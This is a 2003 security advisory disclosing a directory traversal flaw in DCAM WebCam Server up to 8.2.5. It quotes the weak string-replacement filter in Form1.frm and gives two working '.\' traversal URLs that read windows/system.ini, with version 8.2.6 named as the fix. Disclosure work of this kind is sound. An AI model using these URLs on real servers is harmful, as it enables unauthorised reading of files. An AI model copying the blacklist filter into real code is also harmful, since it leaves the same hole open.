####################################################################### Luigi Auriemma Application: DCAM WebCam server http://www.hyperionx.com http://sourceforge.net/projects/dcamserver/ Versions: <= 8.2.5 Platforms: Windows Bug: Directory traversal bug Risk: high Exploitation: remote with browser Date: 22 Dec 2003 Author: Luigi Auriemma e-mail: aluigi@altervista.org web: http://aluigi.altervista.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== DCAM WebCam Server is an OpenSource program written in VisualBasic that allows to capture live streaming video and to broadcast it on the web through the built-in webserver. ####################################################################### ====== 2) Bug ====== The webserver built into DCAM uses a protection to avoid the directory traversal bug. We can see it in Form1.frm: ... 880 page = Replace(page, "..", "") 881 page = Replace(page, "./", "") 882 page = Replace(page, "/.", "") 883 page = Replace(page, "//", "") 884 page = Replace(page, "\", "") ... The problem happens when the attacker uses the pattern ".\" that deceives the checks and allows him to see and download any file in the remote system knowing the path. ####################################################################### =========== 3) The Code =========== http://server/.\.\.\.\/windows/system.ini http://server/.\.\.\.\.\.\.\.\.\.\/windows/system.ini ####################################################################### ====== 4) Fix ====== Version 8.2.6 ####################################################################### --- Luigi Auriemma http://aluigi.altervista.org